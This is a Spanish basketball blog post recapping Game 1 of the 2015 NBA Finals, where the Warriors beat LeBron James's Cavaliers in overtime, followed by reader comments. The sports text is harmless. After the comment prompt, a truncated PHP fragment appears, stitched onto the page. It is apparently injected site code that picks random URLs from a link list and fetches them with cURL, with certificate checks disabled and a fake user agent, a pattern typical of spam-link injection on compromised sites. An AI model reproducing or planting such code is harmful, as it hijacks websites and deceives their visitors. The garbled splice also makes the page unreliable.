La Crónica: The wasp

05 de June de 2015 por TheDeerHunter

Las finales 2015 comenzaron como casi todas durante el último lustro: con LeBron James mandando. Los favoritos Warriors salieron acongojados y los visitantes venían claramente preparados para hacer sangre ante este posible escenario. Gran preparación táctica de David Blatt, con sus hombres muy atentos a los cortes y doblando defensas a Stephen Curry. Los titulares locales, totalmente superados por la tensión y la falta de experiencia en este terreno. Al contrario LeBron, como pez en el agua. Un martillo pilón perfectamente secundado por sus escuderos. Kyrie estelar; Mozgov y Thompson abusando bajo tableros de Bogut & Green; Iman y después Smith castigando desde el triple cada defensa múltiple sobre el líder. Llegaban a acumular una ventaja de 14 en el primer cuarto, con los Warriors por debajo del 30% en tiro y un déficit de 14 a 7 en rebotes. Mucho miedo.

El primer punto de inflexión venía de la segunda unidad. Iguodala y Speights lograban acortar a -10 antes del final del primer cuarto. A la vuelta a pista, el MVP disfrutaba de unos minutos de excelencia en el que los Warriors llegaban incluso a amagar con demarrar con un +5. No había sonrisas de suficiencia por esta vez, sin embargo. La ineficacia del resto de titulares locales, así como los zarpazos de LeBron, equilibraban el choque… hasta que llegó la postrera hazaña de JR Smith con un triplazo monumental justo antes del descanso. Flojo partido general de los Warriors, excepto “picotazos” de Curry y la aportación de Iggy y Speights en la segunda unidad. Con todo, se iban con un -3 pero vivos. No era poco.

En la reanudación vimos una táctica aparentemente incomprensible. Defensa individual a LeBron y sálvese quien pueda. Se producía un monólogo desigual en el que The King no parecía tener freno en el uno contra uno. Green, Barnes e Iguodala quedaban empequeñecidos ante el poderío de la estrella rival. El #23 terminaba el cuarto con más de 25 tiros y excelentes porcentajes. Del resto, sin embargo, canastas puntuales de Mozgov y Irving. Sólo de ellos.

En cambio, Curry parecía ir a “otro rollo”. Ningún pique personal. Soltaba la bola hacia unos compañeros bastante erráticos. Poco a poco Klay iba cogiendo algo el tono. Green o Barnes iban rascando alguna canasta. Con todo los Warriors iban equilibrando el rebote, afinando los porcentajes y, definitivamente, igualando el choque con el tercer cuarto apuntado en su cuenta.

Hasta el final del tiempo reglamentario se iba a seguir en una tónica parecida. La segunda unidad local obligaba a interrumpir el breve descanso de LeBron. A Kyrie se le veía particularmente cómodo. Curry no terminaba de asumir el protagonismo, pero algunos de sus compañeros sí encontraron el camino. La balanza parecía inclinarse, pero LeBron anotaba un triple descomunal para meter el miedo en el cuerpo. La mayor anotación de su carrera en playoffs (44 puntos) Curiosamente su última acción positiva del choque. Iguodala resurgía defensivamente y dos acciones de Curry parecían resolver antes del final del reglamentario. Irving no lo iba a permitir. LeBron llegó a jugarse la victoria en último triple muy poco inteligente. La anterior vez que había habido prórroga en el partido inaugural de la final fue en el 2001, con Iverson de protagonista. Otra coincidencia…

En la reanudación los Cavs cayeron en la desconexión más absoluta. LeBron se apagó y con él todo el equipo. Por si faltara algo, Irving volvía a caer lesionado. Por su parte Stephen Curry aprovechaba el “río revuelto” para resolver con toda la pillería del mundo y excesiva facilidad. Un partido aparentemente discreto… pero con sus compañeros activados en el momento preciso. Enfrente, todo lo contrario. El más difícil todavía para LeBron, que de esta guisa emulará a Jerry West.

Comenta

9 comentarios a esta entrada

  1. Rompe dice:
    #1

    Si mal no recuerdo, esa última frase va dedicada al MVP de las finales que se llevó el señor West aún habiendo perdido, ¿cierto?
    Si con todo el favoritismo de GSW acaban en prórroga en su propia casa, igual la cosa no está descompensada como parecía…

      Citar

  2. iker dice:
    #2

    Rompe:
    Si mal no recuerdo, esa última frase va dedicada al MVP de las finales que se llevó el señor West aún habiendo perdido, ¿cierto?Si con todo el favoritismo de GSW acaban en prórroga en su propia casa, igual la cosa no está descompensada como parecía…

    Yo creo que sin la empanada del primer cuarto de los warriors el partido no se va a la prorroga.

    La tactica de warriors estuvo clara, dejar a lebron tirarse hasta las zapatillas pero que el resto no aporten. y además si en los siguientes partidos irving no va a poder jugar, mala solución tiene cleveland

      Citar

  3. Jonybob dice:
    #3

    Matizamos si quieres
    Acaban en la prorroga con partidos discretos de los Splash bros con Green bastante flojo y con Lbj metiendo 44 puntos.

      Citar

  4. Ruxixón dice:
    #4

    Una pena que esa última jugada no hubiera estado mejor ejecutada y aún así mala suerte que el tiro de Shumpert se saliera,pero así es la vida.En general bastante mejor los Cavs,a mi entender un error la táctica del 1vs1 contra LeBron si tirándose 38 tiros te mete casi el 50%.Me sorprendió lo mal que le defendió Green,que precisamente pensaba que sería el mayor estorbo para James.Si continúan por esa vía los Warriors se equivocan,si bien si Irving no está para el resto de la serie se le pone la cosa aún más de cara.De todas formas,al final este partido lo gana el banquillo de Golden State.Iguodala el mejor,pero vaya daño que nos hizo Speights.

      Citar

  5. Jose Luis dice:
    #5

    Mañana estaré aqui en directo comentando el partido

    espero no ser el único!!

      Citar

  6. Nacho dice:
    #6

    Irving tiene para cuatro meses!!!
    Si los Cav´s no han ganado este partido, y con el base fuera, dudo que rasquen mucho. Descomunal LeBron hasta los dos últimos minutos. Acaba follao el pobre muchacho. Iguodala defendió muy bien en el último tramo. Pero ojo también al partido de Mozgov y a los rebotes de Thompson. Un JR más entonado en la segunda parte y se llevan el partido. El resto de la serie va a ser como las finales del 2007. James ha mejorado mucho su sentido del juego desde entonces, pero será más consciente de que está muy solo. Me da que irá la serie por la vía rápida.

      Citar

  7. Triceratops dice:
    #7

    Jose Luis:
    Mañana estaré aqui en directo comentando el partido

    espero no ser el único!!

    Pues si ke vas a ser el unico, ya que el partido es del domingo al lunes, o eso dice la aplicacion NBA jeje

      Citar

  8. Jose Luis dice:
    #8

    Triceratops: Pues si ke vas a ser el unico, ya que el partido es del domingo al lunes, o eso dice la aplicacion NBA jeje

    joder estaba convencido de que era mañana por la noche 🙁

    pues el domingo me viene fatal, me cago en todo 🙁

      Citar

  9. Jose Luis dice:
    #9

    Bueno va, me quedaré jajajaja

    alguien más? 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>